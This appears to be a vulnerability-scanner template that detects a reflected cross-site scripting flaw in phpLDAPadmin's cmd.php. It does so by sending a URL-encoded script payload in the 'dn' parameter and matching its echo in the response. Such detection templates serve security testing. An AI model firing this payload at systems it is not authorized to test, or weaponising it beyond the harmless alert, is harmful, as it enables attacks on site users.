id: custom-phpldapadmin-xss
info:
  name: Custom PHP LDAP Admin XSS Detection
  author: GodfatherOrwa, herry
  Reference : https://twitter.com/GodfatherOrwa/status/1701392754251563477
  severity: medium

http:
  - method: GET
    path:
      - "{{BaseURL}}/phpldapadmin/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1"
    matchers:
      - type: word
        words:
          - "<ScRiPt >alert('Orwa')</ScRiPt>"
        part: body
